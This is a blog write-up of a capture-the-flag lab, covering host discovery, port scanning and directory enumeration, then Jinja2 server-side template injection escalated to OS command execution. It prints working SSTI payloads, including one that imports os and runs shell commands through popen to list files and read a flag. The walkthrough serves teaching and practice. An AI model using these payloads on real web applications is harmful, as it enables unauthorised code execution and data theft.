<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1758773456323/080a2570-cbdb-4cb5-a460-ad4959ff9092.png" alt class="image--center mx-auto" /></p>
<p>Without console IP disclosure, three discovery vectors exist: ARP cache inspection (fast, requires same subnet), nmap subnet sweep (thorough, time-intensive), or DHCP lease examination (requires hypervisor access). ARP cache provided sufficient granularity, two candidates versus 254; making it the optimal effort-to-information ratio. The ARP command shows the list of IP addresses and their corresponding MAC addresses that your system has recently communicated with on the local network</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Documentation note: Screenshots in this series span multiple testing sessions, so you may notice the target IP address changes between sections. This reflects the dynamic nature of DHCP in virtualized environments and doesn't affect the methodology demonstrated.</div>
</div>

<h2 id="heading-step-1-reconnaissance">Step 1: Reconnaissance</h2>
<p>Now that we have the IP address, I proceeded with a standard nmap scan to identify open ports. The scan revealed ports 22 (SSH) and 5000 (HTTP) were accessible.</p>
<p>The presence of password based authentication in ssh shows it’s a worthy attack vector, and opening accessing the port 5000 using a web-browser reveals a static web page titled R&amp;D portal.</p>
<h3 id="heading-ssh-exploit">SSH exploit:</h3>
<p>SSH authentication without username enumeration or organizational context is at best, brute force. This approach is statistically futile in CTF environments which are designed around exploiting than guessing. Port 5000 suggests custom application development ( HTTP service on non-standard port ), indicating a higher probability of implementation vulnerabilities than the hardened SSH daemons.</p>
<h3 id="heading-web-page-exploit">Web page exploit:</h3>
<p>The homepage served on port 5000 appeared completely static; buttons were non-functional, no dynamic content was visible, and no obvious navigation paths existed. This warranted directory enumeration using <code>gobuster</code> with the DirBuster wordlist from <a target="_blank" href="https://github.com/danielmiessler/SecLists/">SecLists</a>, which discovered a <code>/page</code> endpoint containing a text input field with greeting functionality.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1758807031244/05872a9a-781a-4315-8a54-49a5db2d1888.png" alt class="image--center mx-auto" /></p>
<p>The greeting mechanism suggested potential Server-Side Template Injection. Arithmetic evaluation (<code>{{7×7}}</code>→49) provides unambiguous confirmation. If the server returns ‘Hello 49!’, template processing occurred server side. String operations could reflect client-side JavaScript. Mathematical mutation offers binary clarity, either the template executed, or it didn’t.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text"><strong>SSTI ( Server Side Template Injection ) </strong>occurs when web applications unsafely embed user input directly into template engines (Jinja2, Twig etc) allowing attackers to inject malicious template directives which execute as server side code. Read more <a target="_self" href="https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection">here</a></div>
</div>

<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1758806696119/8d748efc-e89f-4cf2-be1c-43b9a3732479.png" alt class="image--center mx-auto" /></p>
<p>As a standard practice, I tried to find out all the available classes using the payload <code>{{''.class.mro[1].subclasses()}}</code>. Effectively, this payload traverses to the base <code>object</code> class of the empty string using the MRO method, which can traverse the parent classes of a given class. The <code>subclasses()</code> method helps us enumerate the currently available modules, which may be used to set up a reverse-shell.</p>
<p>Upon running the payload, a long list of empty strings along with a singular class name was returned It looked something like <code>[, , , , , , , , ,…..,typing.Any, , , , …..]</code> In order to optimize the effort, I tried searching for the <code>_wrap_close</code> module, which helps in <a target="_blank" href="https://agrohacksstuff.io/posts/os-commands-with-python/">gaining access to the OS module</a>. The <code>_wrap_close</code> wraps file like objects, and critically its <code>__init__.__globals__</code> dictionary typically references to system modules like <code>sys, os</code> which are required for file operations. It is a reliable, and well documented path from the template context to OS-level execution. It is consistently available across Python versions.</p>
<p>The payload used was <code>{% for sc in ''.class.mro[1].subclasses() %}{% if</code> <a target="_blank" href="http://sc.name"><code>sc.name</code></a> <code>== '_wrap_close' %}{{ loop.index0 }}{% endif %}{% endfor %}</code></p>
<p>Running this command is expected to return is the index of the <code>_wrap_close</code> module, and sure enough, the number 140 was returned.</p>
<p>The next step is trying to access the <code>os</code> module from this, so I first tried this payload: <code>{{ ''.class.mro[1].subclasses()[140].init.globals['os'].listdir() }}</code>. This payload effectively tried to access the <code>os</code> module via the <code>__globals__</code> directory of the class’ <code>__init__</code> method. <code>os.listdir()</code> is a basic function which lists the files in the current directory.</p>
<p>The direct <code>__globals__['os']</code> approach returned HTTP 500, indicating either namespace limitations or filtering. Since <code>__builtins__</code> provides Python's core import machinery and typically exists in all execution contexts, pivoting to dynamic import via <code>__import__</code> bypasses potential restrictions on pre-imported modules. I tried the payload <code>{{ ‘‘.__class__.__mro__[1].__subclasses__()[140].__init__.__globals__[‘__builtins__’][‘__import__’](‘os’).popen(‘ls -la’).read() }}</code></p>
<p>The payload finally succeeded, and the output shows the contents of the filesystem of the <code>www-data</code> user, which is a common username used for service accounts used to serve web content over the server. One of the file, <code>F14@_0n3.txt</code> stands out in particular, and may reveal the value of the first flag. The app.py is probably the process which the application connects to, reading this could provide more vulnerabilities or logic flaws.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1759742744923/57417c0d-5f22-4fc2-a6c3-19d3ecd06f6a.png" alt="Screenshot of the directory listing returned by the payload" class="image--center mx-auto" /></p>
<p>Slightly modifying the payload to read the <code>F14@_0n3.txt</code> file instead of listing the directory structure reveals the first flag to us.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1759742979524/ffa60fd9-b58d-417b-ae56-5f2607d00946.png" alt class="image--center mx-auto" /></p>
<p>The first flag secured, but <code>www-data</code> user access is merely a foothold, not privilege. The SSTI vulnerability that gave us file reading capabilities can offer something far more valuable: Arbitrary Command Execution. This is a common way of establishing presence.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Next in series: <strong>Terrier CTF [Part 2]: PCAP Dissection: Carving Secrets from Captured Packets</strong></div>
</div>

<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Shout out to my friend, <a target="_self" href="https://www.linkedin.com/in/abhijeet-somashila/">Abhijeet</a> for the awesome cover image he designed!</div>
</div>]]></content:encoded></item></channel></rss>